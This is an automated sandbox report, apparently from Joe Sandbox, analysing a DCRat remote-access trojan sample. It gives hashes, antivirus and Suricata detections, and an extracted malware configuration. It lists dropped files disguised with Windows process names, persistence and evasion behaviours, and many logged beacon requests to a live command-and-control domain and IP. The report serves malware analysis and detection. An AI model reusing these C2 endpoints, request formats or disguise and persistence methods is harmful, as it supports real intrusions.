Windows Analysis Report
4KjLUaW30K.exe

Overview

General Information

Sample name: 4KjLUaW30K.exe
renamed because original name is a hash value
Original sample name: 181d043c0617914801548f09d5b776d4.exe
Analysis ID: 1561676
MD5: 181d043c0617914801548f09d5b776d4
SHA1: 757f042065a3dc2c9f73e635b41f83591c8ad647
SHA256: 501aa5f94b15b8716ef7f76e2dbdc146b436cd9e72274d6ec5dec7265706c0ad
Tags: DCRatexeuser-abuse_ch
Infos:

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 4KjLUaW30K.exe Avira: detected
Antivirus detection for URL or domain
Source: http://a1043195.xsph.ru/e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/ Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru Avira URL Cloud: Label: malware
Source: http://a1043195.xsph.ru/e561840a.php?I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\28bf72c6-5a6e-449b-a0d6-76cd4ab5c11d.vbs Avira: detection malicious, Label: VBS/Starter.VPVT
Source: C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs Avira: detection malicious, Label: VBS/Runner.VPXJ
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Recovery\System.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\ae22e728c3f23233571eb704564b4445f7960812.exe Avira: detection malicious, Label: HEUR/AGEN.1323984
Found malware configuration
Source: 00000000.00000002.2086148884.0000000012A2F000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: DCRat {"SCRT": "{\"d\":\".\",\"1\":\"%\",\"I\":\"@\",\"U\":\" \",\"5\":\"(\",\"J\":\"*\",\"M\":\"&\",\"A\":\"-\",\"T\":\")\",\"C\":\",\",\"B\":\"_\",\"L\":\"^\",\"R\":\"~\",\"y\":\">\",\"i\":\"!\",\"0\":\"`\",\"V\":\"<\",\"G\":\"$\",\"E\":\"|\",\"9\":\"#\",\"3\":\";\"}", "PCRT": "{\"F\":\"&\",\"W\":\">\",\"X\":\"^\",\"2\":\"`\",\"0\":\",\",\"S\":\";\",\"u\":\"-\",\"G\":\"_\",\"J\":\"*\",\"C\":\"#\",\"Q\":\"@\",\"U\":\"<\",\"c\":\" \",\"b\":\"(\",\"d\":\"!\",\"z\":\"%\",\"T\":\"|\",\"V\":\")\",\"k\":\".\",\"R\":\"$\",\"a\":\"~\"}", "TAG": "", "MUTEX": "DCR_MUTEX-lWaBBBPi9nde67B22ADT", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": null, "AS": false, "ASO": false, "AD": false}
Multi AV Scanner detection for domain / URL
Source: a1043195.xsph.ru Virustotal: Detection: 11% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe ReversingLabs: Detection: 83%
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe ReversingLabs: Detection: 83%
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe ReversingLabs: Detection: 83%
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe ReversingLabs: Detection: 83%
Source: C:\Recovery\System.exe ReversingLabs: Detection: 83%
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe ReversingLabs: Detection: 83%
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\ae22e728c3f23233571eb704564b4445f7960812.exe ReversingLabs: Detection: 83%
Multi AV Scanner detection for submitted file
Source: 4KjLUaW30K.exe ReversingLabs: Detection: 83%
Source: 4KjLUaW30K.exe Virustotal: Detection: 68% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe Joe Sandbox ML: detected
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Joe Sandbox ML: detected
Source: C:\Recovery\System.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ae22e728c3f23233571eb704564b4445f7960812.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 4KjLUaW30K.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: 4KjLUaW30K.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 4KjLUaW30K.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49732 -> 141.8.192.93:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49708 -> 141.8.192.93:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49759 -> 141.8.192.93:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49786 -> 141.8.192.93:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49836 -> 141.8.192.93:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49878 -> 141.8.192.93:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49897 -> 141.8.192.93:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49913 -> 141.8.192.93:80
Source: Network traffic Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.5:49955 -> 141.8.192.93:80
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 141.8.192.93 141.8.192.93
Source: Joe Sandbox View IP Address: 141.8.192.93 141.8.192.93
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SPRINTHOSTRU SPRINTHOSTRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: a1043195.xsph.ru
Source: global traffic HTTP traffic detected: GET /e561840a.php?GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a1043195.xsph.ruConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /e561840a.php?GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc&oLMXJz0G0y3pzTSj=jQQep HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: a1043195.xsph.ru
